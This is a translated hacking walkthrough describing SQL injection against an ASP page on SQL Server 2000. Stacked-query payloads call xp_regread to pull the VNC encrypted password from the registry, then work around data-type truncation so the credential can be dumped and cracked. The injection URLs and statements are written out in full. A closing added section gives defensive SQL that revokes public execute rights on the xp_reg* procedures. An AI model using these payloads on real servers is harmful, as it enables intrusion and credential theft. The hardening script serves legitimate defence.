http://www.something.com/script.asp?id=2; declare @result ... aster.dbo.xp_regread HKEY_CURRENT_USER, SOFTWARE\ORL\WINVNC3, Password, @result output insert into cyfd (gyfd) values (@result);
This reads the encrypted password value from the registry and inserts it into the table just built. Then fetch the VNC encrypted password out of the table:
http://www.something.com/script.asp ... sp; 1 = (select count(*) from cyfd where gyfd > 1).
But the result was not what I hoped: the value of gyfd was empty. If it were that easy, there would be no need for this article. What was the reason? Was my syntax wrong? I checked it and found no mistake. Is the value in the registry of a different type? So I installed VNC on my own machine and tested in Query Analyzer; the result was a number, 5. At this time CZY was online, so I asked him, and he advised me to change the data type of the gyfd field to binary and try again. So I tested on my own machine, submitting as follows:
http://127.0.0.1/script.asp?id=2; create table [dbo].[cyfd] ([gyfd] [binary] (20));
http://127.0.0.1/script.asp?id=2; declare @result bin... er.dbo.xp_regread HKEY_CURRENT_USER, SOFTWARE\ORL\WINVNC3, Password, @result output insert into cyfd (gyfd) values (@result);--
Then I used NBSI to dump the value of gyfd in the cyfd table. The result came out: the VNC encrypted password value was 0x0e3515ac0000000000000000000000000000. But something is wrong here: the VNC password value in my machine's registry is HEX: 0E, 35, 15, AC, 00, 62, D3, 08. The storage length of binary(n) is fixed: when the input is shorter than n bytes, the remaining length is padded with 0. The binary(20) I wrote in the injection statement is long enough for the VNC encrypted password, so why is there so much 0 padding? This is because my VNC password is 0E3515AC0062D308. When xp_regread meets 00, it thinks it has finished reading the value and treats the 00 as a terminator, so I only got 0x0e3515ac. I was dizzy! After leafing through the book, I finally found the special data type uniqueidentifier, which stores 16 bytes of binary data. Changing the injection statements:
http://127.0.0.1/script.asp?id=2; create table [dbo].[cyfd] ([gyfd] [uniqueidentifier]);
http://127.0.0.1/script.asp?id=2; declare @result unique... ster.dbo.xp_regread HKEY_CURRENT_USER, Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values (@result);--
Then dumping with NBSI, the result came out as AC15350E-6200-08D3-0000-000000000000.
What is the difference between AC15350E-6200-08D3-0000-000000000000 and the correct VNC password value in the registry, 0e3515ac0062d308? Just the byte order within the groups is reversed; I believe everyone can do elementary-school arithmetic, so this doesn't need teaching. Now crack the VNC password and see whether it works.
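The registry-read route above works only because, on a default SQL Server 2000 install, the public role can execute xp_regread, so any login the web application uses can reach the registry through an injection point. The script below is an added example (not from the original article, not Microsoft's code) of the standard hardening and its verification; it assumes a sysadmin session on SQL Server 2000 and uses the real extended procedure names of that version.

```sql
-- Added example: remove public's execute right on the registry extended procedures
-- (SQL Server 2000) and verify the result. Run as sysadmin.
use master
go

-- 1. Before: show explicit permissions on the two procedures the articles above use.
--    sp_helprotect lists grants per grantee; a row for 'public' is what we want gone.
exec sp_helprotect 'xp_regread'
exec sp_helprotect 'xp_regwrite'

-- 2. Revoke execute from public on every registry extended procedure. Members of
--    sysadmin are unaffected by these revokes and keep the ability to call them.
revoke execute on xp_regread              from public
revoke execute on xp_regwrite             from public
revoke execute on xp_regenumkeys          from public
revoke execute on xp_regenumvalues        from public
revoke execute on xp_regdeletekey         from public
revoke execute on xp_regdeletevalue       from public
revoke execute on xp_regaddmultistring    from public
revoke execute on xp_regremovemultistring from public
go

-- 3. After: no 'public' row should remain for any xp_reg* procedure. This query walks
--    sysprotects directly so it does not depend on sp_helprotect.
select o.name, u.name as grantee, p.protecttype
from sysprotects p
join sysobjects o on o.id = p.id
join sysusers   u on u.uid = p.uid
where o.xtype = 'X' and o.name like 'xp_reg%'
order by o.name, u.name

-- 4. Functional check, run as a login that is only db_owner of the web database
--    (constructed test; a harmless key): this must now fail with error 229,
--    "EXECUTE permission denied", instead of returning a value.
-- exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
--      'SOFTWARE\Microsoft\MSSQLServer\MSSQLServer', 'LoginMode'
```

Revoking from public is the minimum; the larger fix that the first article itself points at is not letting the web application connect as a db_owner, db_ddladmin or sysadmin login at all, so that drop procedure and create procedure in master are not available through an injection point in the first place.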